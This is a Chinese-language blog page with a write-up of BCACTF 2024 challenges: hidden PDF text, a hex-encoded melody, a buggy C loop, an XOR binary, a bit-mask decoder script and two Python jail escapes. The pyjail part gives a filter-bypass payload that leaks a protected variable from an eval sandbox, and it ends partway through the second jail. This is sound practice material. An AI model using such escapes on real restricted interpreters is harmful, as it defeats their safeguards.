

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/logo.png">
  <link rel="icon" href="/img/logo.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="xciphand">
  <meta name="keywords" content="">
  
    <meta name="description" content="做题日常">
<meta property="og:type" content="article">
<meta property="og:title" content="BCACTF-1">
<meta property="og:url" content="http://xciphand.github.io/2024/07/15/BCACTF-1/index.html">
<meta property="og:site_name" content="xciphand&#39;s Blog">
<meta property="og:description" content="做题日常">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://xciphand.github.io/2024/07/15/BCACTF-1/0_harmony.png">
<meta property="og:image" content="http://xciphand.github.io/2024/07/15/BCACTF-1/harmony.png">
<meta property="og:image" content="http://xciphand.github.io/2024/07/15/BCACTF-1/xor_1.png">
<meta property="og:image" content="http://xciphand.github.io/2024/07/15/BCACTF-1/xor.png">
<meta property="og:image" content="http://xciphand.github.io/2024/07/15/BCACTF-1/phone_number.png">
<meta property="og:image" content="http://xciphand.github.io/2024/07/15/BCACTF-1/phone_number_1.png">
<meta property="og:image" content="http://xciphand.github.io/2024/07/15/BCACTF-1/tic-tac-toe.png">
<meta property="article:published_time" content="2024-07-15T03:01:44.000Z">
<meta property="article:modified_time" content="2024-07-29T11:47:41.587Z">
<meta property="article:author" content="xciphand">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="wp">
<meta property="article:tag" content="BCACTF">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://xciphand.github.io/2024/07/15/BCACTF-1/0_harmony.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>BCACTF-1 - xciphand&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"xciphand.github.io","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":25,"cursorChar":"_","loop":false,"scope":["home","post"]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":"3237bba859b3a7d781ea97eaf8d6c894","google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  
    <!-- Baidu Analytics -->
    <script async>
      if (!Fluid.ctx.dnt) {
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?3237bba859b3a7d781ea97eaf8d6c894";
          var s = document.getElementsByTagName("script")[0];
          s.parentNode.insertBefore(hm, s);
        })();
      }
    </script>
  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  



  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>xciphand&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="BCACTF-1"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-07-15 11:01" pubdate>
          2024年7月15日 上午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.9k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          16 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">BCACTF-1</h1>
            
            
              <div class="markdown-body">
                
                <p>做题日常</p>
<h1 id="foren"><a href="#foren" class="headerlink" title="foren"></a>foren</h1><h2 id="23-719"><a href="#23-719" class="headerlink" title="23-719"></a>23-719</h2><h4 id="描述"><a href="#描述" class="headerlink" title="描述"></a>描述</h4><p>紧跟时事，给了一个川宝诉讼案相关的pdf文件，通过一番搜索，找到了原始文件 <a target="_blank" rel="noopener" href="https://www.supremecourt.gov/opinions/23pdf/23-719_19m2.pdf">https://www.supremecourt.gov/opinions/23pdf/23-719_19m2.pdf</a> ，对比发现抬头被改了。<br>ctrl + A 全选，粘贴后发现了隐藏文字中的flag。</p>
<h2 id="Mysterious-Melody"><a href="#Mysterious-Melody" class="headerlink" title="Mysterious Melody"></a>Mysterious Melody</h2><h4 id="描述-1"><a href="#描述-1" class="headerlink" title="描述"></a>描述</h4><p>给了一段音频，开头有个十六级的音阶，暗示了十六进制。接着后面一串就是加密数据了。<br>由于有背景音频的干扰，无法使用常规的脚本分析，我这里先采用了ai音频分离，使用的是<a target="_blank" rel="noopener" href="https://www.lalal.ai/%E8%BF%99%E4%B8%AA%E7%BD%91%E7%AB%99%EF%BC%8C%E6%8F%90%E5%8F%96%E5%87%BA%E9%92%A2%E7%90%B4%E7%9A%84%E9%9F%B3%E9%A2%91%E3%80%82">https://www.lalal.ai/这个网站，提取出钢琴的音频。</a></p>
<img src="/2024/07/15/BCACTF-1/0_harmony.png" srcset="/img/loading.gif" lazyload class="">
<p>接着打开一个扒谱网站，<a target="_blank" rel="noopener" href="https://madderscientist.github.io/noteDigger/%EF%BC%8C%E5%8F%AF%E4%BB%A5%E7%9C%8B%E5%88%B0%E9%9F%B3%E9%A2%91%E4%BF%A1%E6%81%AF%E5%BE%88%E5%A5%BD%E7%9A%84%E8%A2%AB%E5%91%88%E7%8E%B0%E4%BA%86%E5%87%BA%E6%9D%A5%E3%80%82">https://madderscientist.github.io/noteDigger/，可以看到音频信息很好的被呈现了出来。</a></p>
<img src="/2024/07/15/BCACTF-1/harmony.png" srcset="/img/loading.gif" lazyload class="">
<p>手工写下数据<code>6263616374667b62656175746966756c5f6d656c6f64795f62656175746966756c5f6861726d6f6e797d</code><br>十六进制转码得到flag。<code>bcactf&#123;beautiful_melody_beautiful_harmony&#125;</code></p>
<h1 id="REV"><a href="#REV" class="headerlink" title="REV"></a>REV</h1><h2 id="Broken-C-Code"><a href="#Broken-C-Code" class="headerlink" title="Broken C Code"></a>Broken C Code</h2><h4 id="描述-2"><a href="#描述-2" class="headerlink" title="描述"></a>描述</h4><p>给了一段c语言代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;math.h&gt;</span></span><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> &#123;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Here&#x27;s your flag!\n\n&quot;</span>);<br>    <span class="hljs-type">int</span> flag[] = &#123;<span class="hljs-number">9607</span>, <span class="hljs-number">9804</span>, <span class="hljs-number">9412</span>, <span class="hljs-number">9804</span>, <span class="hljs-number">13459</span>, <span class="hljs-number">10407</span>, <span class="hljs-number">15132</span>, <span class="hljs-number">9804</span>, <span class="hljs-number">9028</span>, <span class="hljs-number">9804</span>, <span class="hljs-number">2307</span>, <span class="hljs-number">10003</span>, <span class="hljs-number">4764</span>, <span class="hljs-number">9028</span>, <span class="hljs-number">10407</span>, <span class="hljs-number">5332</span>, <span class="hljs-number">7747</span>, <span class="hljs-number">10204</span>, <span class="hljs-number">4627</span>,<span class="hljs-number">9028</span>, <span class="hljs-number">3028</span>, <span class="hljs-number">5187</span>, <span class="hljs-number">2707</span>, <span class="hljs-number">6087</span>, <span class="hljs-number">5628</span>, <span class="hljs-number">2812</span>, <span class="hljs-number">9028</span>, <span class="hljs-number">3028</span>, <span class="hljs-number">2919</span>, <span class="hljs-number">2503</span>, <span class="hljs-number">2707</span>, <span class="hljs-number">3028</span>, <span class="hljs-number">3139</span>, <span class="hljs-number">2503</span>, <span class="hljs-number">3028</span>, <span class="hljs-number">2919</span>, <span class="hljs-number">15628</span>, <span class="hljs-number">103</span>&#125;;<br>    <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-keyword">sizeof</span>(flag); i++)<br>        <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%c&quot;</span>,(<span class="hljs-type">char</span>)<span class="hljs-built_in">sqrt</span>(flag[i++]<span class="hljs-number">-3</span>));<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>输出的结果是乱码的</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">bat&#123;_0EfXD74K_6487&#125;RR㈡骀&lt;bgG屜N嬈8o<br></code></pre></td></tr></table></figure>

<p>这个时候将c代码转成python代码就可以得到正确结果了。</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-keyword">import</span> math<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;&quot;</span>.join([<span class="hljs-built_in">chr</span>(<span class="hljs-built_in">int</span>(math.sqrt(i-<span class="hljs-number">3</span>))) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> [<span class="hljs-number">9607</span>, <span class="hljs-number">9804</span>, <span class="hljs-number">9412</span>, <span class="hljs-number">9804</span>, <span class="hljs-number">13459</span>, <span class="hljs-number">10407</span>, <span class="hljs-number">15132</span>, <span class="hljs-number">9804</span>, <span class="hljs-number">9028</span>, <span class="hljs-number">9804</span>, <span class="hljs-number">2307</span>, <span class="hljs-number">10003</span>, <span class="hljs-number">4764</span>, <span class="hljs-number">9028</span>, <span class="hljs-number">10407</span>, <span class="hljs-number">5332</span>, <span class="hljs-number">7747</span>, <span class="hljs-number">10204</span>, <span class="hljs-number">4627</span>,<span class="hljs-number">9028</span>, <span class="hljs-number">3028</span>, <span class="hljs-number">5187</span>, <span class="hljs-number">2707</span>, <span class="hljs-number">6087</span>, <span class="hljs-number">5628</span>, <span class="hljs-number">2812</span>, <span class="hljs-number">9028</span>, <span class="hljs-number">3028</span>, <span class="hljs-number">2919</span>, <span class="hljs-number">2503</span>, <span class="hljs-number">2707</span>, <span class="hljs-number">3028</span>, <span class="hljs-number">3139</span>, <span class="hljs-number">2503</span>, <span class="hljs-number">3028</span>, <span class="hljs-number">2919</span>, <span class="hljs-number">15628</span>, <span class="hljs-number">103</span>]]))<br></code></pre></td></tr></table></figure>

<h4 id="考点分析"><a href="#考点分析" class="headerlink" title="考点分析"></a>考点分析</h4><p>这里考察的是代码审计能力，在循环条件中，i已经自增了，但在<code>flag[i++]</code>里，i又自增了一次，导致跳过了一般的字符，输出乱码。</p>
<h2 id="XOR"><a href="#XOR" class="headerlink" title="XOR"></a>XOR</h2><h4 id="描述-3"><a href="#描述-3" class="headerlink" title="描述"></a>描述</h4><p>给了一个可执行文件，运行后得到：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs text">Encrypted flag: 21 0F 0A 15 3F 29 29 6B 13 1C 2C 74 7D 30 5E 50 6E 29 2B 24 19 0C 67 7D 05 54 7C 34 5C 13 32 42 29 62 7B 0F 4E <br></code></pre></td></tr></table></figure>
<img src="/2024/07/15/BCACTF-1/xor_1.png" srcset="/img/loading.gif" lazyload class="">
<p>用<code>010 hexEditor</code>打开，发现一串可疑字符<code>ClkvKOR8JQA1JB731LeGkU7J4d2khDvrOPI63mM7</code><br>使用<code>xor</code>解出flag</p>
<img src="/2024/07/15/BCACTF-1/xor.png" srcset="/img/loading.gif" lazyload class="">

<h1 id="misc"><a href="#misc" class="headerlink" title="misc"></a>misc</h1><h2 id="reload-decode"><a href="#reload-decode" class="headerlink" title="reload-decode"></a>reload-decode</h2><h4 id="描述-4"><a href="#描述-4" class="headerlink" title="描述"></a>描述</h4><blockquote>
<p>Greetings neighbor. My name’s Crazy Dave but you can just call me Crazy Dave.<br>I found this weird website that seems to represent something. Says something about taco as a reward<br>Can you find whatever the code is and hand it to me?<br>I could really go for a taco right now</p>
</blockquote>
<h4 id="wp"><a href="#wp" class="headerlink" title="wp"></a>wp</h4><p>从源码中找到关键加密部分：</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;flag.txt&quot;</span>) <span class="hljs-keyword">as</span> f:<br>    flag = <span class="hljs-built_in">bytearray</span>(f.read().encode())<br>flag_str = <span class="hljs-string">&quot;&quot;</span><br><span class="hljs-keyword">for</span> b <span class="hljs-keyword">in</span> flag:<br>    b = b &lt;&lt; <span class="hljs-number">4</span> ^ ((b &lt;&lt; <span class="hljs-number">4</span> &amp; <span class="hljs-number">0xFF</span>) &gt;&gt; <span class="hljs-number">4</span>)<br>    bm = <span class="hljs-number">1</span> &lt;&lt; random.randint(<span class="hljs-number">0</span>, <span class="hljs-number">11</span>)<br>    cb = b ^ bm<br>    flag_str += <span class="hljs-built_in">bin</span>(cb)[<span class="hljs-number">2</span>:].zfill(<span class="hljs-number">12</span>)<br></code></pre></td></tr></table></figure>
<p>分析一下，<code>b</code>为特定位运算的结果，<code>bm</code>为从<code>2^0 ~ 2^11</code>的掩码，<code>cb</code>为异或后结果。</p>
<p>于是，可以得到解题思路为：</p>
<ol>
<li>从网页上获取到二进制字符串，以12为单位长度划分，对应flag的一个字符。</li>
<li>使用可打印字符通过位运算和异或运算构造一个加密字典。(b &#x3D; b &lt;&lt; 4 ^ ((b &lt;&lt; 4 &amp; 0xFF) &gt;&gt; 4))</li>
<li>让数据分别与<code>2^0 ~ 2^11</code>进行异或运算，再与加密字典中的字符匹配，得到可疑字符（因为得到的字符可能不止一个）。</li>
<li>重复<code>1~3</code>，获得多组可疑字符，再提取其中重复出现的字符，连接形成flag。</li>
</ol>
<h4 id="解题代码"><a href="#解题代码" class="headerlink" title="解题代码"></a>解题代码</h4><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-keyword">import</span> string<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">solve</span>():<br>    binstr_list = [<br>        <span class="hljs-string">&quot;111000100010011000110111011000010011011000111011011100000100011101100110011010111011111011101110000100000000011101100111001011010101010110001000010001000101011110100010001000110011001101110111011000110011001011111101010000000010101011011101011100000100011000010101011001110011011011011111011011011101111000110011010001010111011110001001011010011000011000101010011011100110010000100010011010101010000010011001010010001100011110101010011110101000010010010001010010101000011100001000011101100111011000100000010101100111010010101000011100000010010110101000011111011111&quot;</span>,<br>        <span class="hljs-string">&quot;001000100010011000110010011000010101011000110111011101000101011001100111011010111011011111101110001101000000001101110111011011011101010010101000010001110101011100100011101100110011001001110011011000110011011011011101110000000000001010011101011101000101010000010001011000010011111011111111101011011101111000110011010001100111001110001000011010001010011000110010011011101111010110100010001110101010010010001001010010001001110110101010001110101010010010011011010010000000111100000000011111100110111000100010010101111111011010101010011110000000010111101010011111111101&quot;</span>,<br>        <span class="hljs-string">&quot;011100100010011000110111011000000001011100110011001101000100011001000110010110111011011001101110001100000010011101110011001011011100010011001000000001010101111100100010001100010011001001110011011100100011001011011100000000000000001011011111011101000000001000010001011000110010011011011111011011011101011100110011010001111111011111001000011010001010011000100011011011101010010100000010011111101010010010011011000010001000010100101010011110101000000010011001010010011000011100010000011101000110011000100110010100110111011010101010011000000000010110111010011111011001&quot;</span>,<br>        <span class="hljs-string">&quot;001000100010001000110011011000110001011000110010011001000100011001100100011010111011011011101111001000000000011111110111001011001101010010011000010001011101010100100010001100100011001001110110001100110011001011111101110000000000001011011001011101100100011000000001011000111011011111111111000011011101001000110011010101110111011110101000001010001000011000100110010011101110010110100010011110111010010010010001011010001000110110101010011110111010010000011001010010000000011101000000011101100010011000000010010101110011010010101000111100000000000110101010011111011001&quot;</span>,<br>        <span class="hljs-string">&quot;011001100010011000110111011000010000011000110010011111000100011001110110011110111111011011101111001110000000111101110111001011011001010010011000010001000101011100000010001100111011001001110110001100110011001111011101010100000000011011011101011100000100011000010101011010110011011011111101001011011111011001110011000001110111111110001000011000001000011001100010011011001110010101100010001110101010011010011001010010000000010110101000011110101000011010011001011010001000011000000000011001100110011000100110010001110111010010111010011100001000110110101010011111001101&quot;</span>,<br>        <span class="hljs-string">&quot;011000100000011000110001011000010000011010110011011111000100001001100110011111111011011011100110101100000000010101110111101011011101000010001000010001010001011100100011101100110011001001111111011100110111001011011001010001000000001011011001011101010100011000010000011000110010011011111101001011011111111000110011110001110111011110011000011010001100011000110010011111101110011100100010011110111010010110011001010010001100010110101110011110001010011010011001010011001000011100000010011101101110011001100010010101110110000010101010001100000000010110100010111111011101&quot;</span>,<br>    ]<br>    suspicious = []<br>    decode_dict = &#123;&#125;<br>    <span class="hljs-keyword">for</span> b <span class="hljs-keyword">in</span> <span class="hljs-built_in">bytearray</span>(string.printable.encode()):<br>        c = b &lt;&lt; <span class="hljs-number">4</span> ^ ((b &lt;&lt; <span class="hljs-number">4</span> &amp; <span class="hljs-number">0xFF</span>) &gt;&gt; <span class="hljs-number">4</span>)<br>        decode_dict[c] = <span class="hljs-built_in">chr</span>(b)<br>    masks = [<span class="hljs-number">1</span> &lt;&lt; i <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">12</span>)]<br><br>    <span class="hljs-keyword">for</span> binstr <span class="hljs-keyword">in</span> binstr_list:<br>        bin_list = [binstr[i : i + <span class="hljs-number">12</span>] <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-built_in">len</span>(binstr), <span class="hljs-number">12</span>)]  <span class="hljs-comment"># 12位分组</span><br>        <span class="hljs-keyword">for</span> bin_segment <span class="hljs-keyword">in</span> bin_list:<br>            e = <span class="hljs-built_in">int</span>(bin_segment, <span class="hljs-number">2</span>)<br>            sus = <span class="hljs-string">&quot;&quot;</span><br>            <span class="hljs-keyword">for</span> mask <span class="hljs-keyword">in</span> masks:<br>                masked_value = e ^ mask<br>                <span class="hljs-keyword">if</span> masked_value <span class="hljs-keyword">in</span> decode_dict:<br>                    sus += decode_dict[masked_value]<br>            suspicious.append(sus)<br><br>    num_segments = <span class="hljs-number">47</span><br>    segment_length = <span class="hljs-built_in">len</span>(suspicious) // num_segments<br><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(num_segments):<br>        find = <span class="hljs-literal">False</span><br>        <span class="hljs-keyword">for</span> char <span class="hljs-keyword">in</span> suspicious[i]:<br>            <span class="hljs-keyword">if</span> find:<br>                <span class="hljs-keyword">break</span><br>            <span class="hljs-keyword">for</span> k <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(segment_length):<br>                <span class="hljs-keyword">if</span> char <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> suspicious[k * num_segments + i]:<br>                    <span class="hljs-keyword">break</span><br>            <span class="hljs-keyword">else</span>:<br>                <span class="hljs-built_in">print</span>(char, end=<span class="hljs-string">&quot;&quot;</span>)<br>                find = <span class="hljs-literal">True</span><br><br><br>solve()<br></code></pre></td></tr></table></figure>

<h2 id="pyjail-1"><a href="#pyjail-1" class="headerlink" title="pyjail-1"></a>pyjail-1</h2><h4 id="描述-5"><a href="#描述-5" class="headerlink" title="描述"></a>描述</h4><p>过滤了print + 本地flag变量 + exec 的沙箱逃逸。</p>
<h4 id="wp-1"><a href="#wp-1" class="headerlink" title="wp"></a>wp</h4><p>raise OSError(locals()[chr(102) + chr(108) + chr(97) + chr(103)])</p>
<h2 id="pyjail-2"><a href="#pyjail-2" class="headerlink" title="pyjail-2"></a>pyjail-2</h2><h4 id="描述-6"><a href="#描述-6" class="headerlink" title="描述"></a>描述</h4><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-keyword">def</span> <span class="hljs-title function_">sanitize</span>(<span class="hljs-params">letter</span>):<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Checking for contraband...&quot;</span>)<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">any</span>([i <span class="hljs-keyword">in</span> letter.lower() <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> BANNED_CHARS])<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">end</span>():<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Contraband letters found!\nMessages Deleted!&quot;</span>)<br>    exit()<br><br>BANNED_CHARS = <span class="hljs-string">&quot;gdvxfiyundmnet/\\&#x27;~`@#$%^&amp;.&#123;&#125;0123456789&quot;</span><br>flag = <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;flag.txt&#x27;</span>).read().strip()<br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Welcome to the prison&#x27;s mail center&quot;</span>)<br><br>msg = <span class="hljs-built_in">input</span>(<span class="hljs-string">&quot;\nPlease enter your message: &quot;</span>)<br><br><span class="hljs-keyword">while</span> msg != <span class="hljs-string">&quot;&quot;</span>:<br>    <span class="hljs-keyword">if</span> sanitize(msg):<br>        end()<br><br>    <span class="hljs-keyword">try</span>:<br>        x = <span class="hljs-built_in">eval</span>(msg)<br>        <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(x) != <span class="hljs-built_in">len</span>(flag): end()<br>        <span class="hljs-built_in">print</span>(x)<br>    <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">f&#x27;Error occured: <span class="hljs-subst">&#123;<span class="hljs-built_in">str</span>(e)&#125;</span>; Message could not be sent.&#x27;</span>)<br><br>    msg = <span class="hljs-built_in">input</span>(<span class="hljs-string">&quot;\nPlease enter your message: &quot;</span>)<br></code></pre></td></tr></table></figure>

<ol>
<li>过滤条件，不能包含字符<code>gdvxfiyundmnet/\\&#39;~`@#$%^&amp;.&#123;&#125;0123456789</code>。</li>
<li>使用<code>eval</code>执行，自带回显。</li>
</ol>
<h4 id="wp-2"><a href="#wp-2" class="headerlink" title="wp"></a>wp</h4><p>目标是构造出<code>locals()[&quot;flag&quot;]</code>，但其中<code>f</code>，<code>g</code>以及数字都被过滤了。</p>
<p>但注意到<code>chr</code>没有被过滤，于是我们可以通过其他手段构造出所需要的数字。</p>
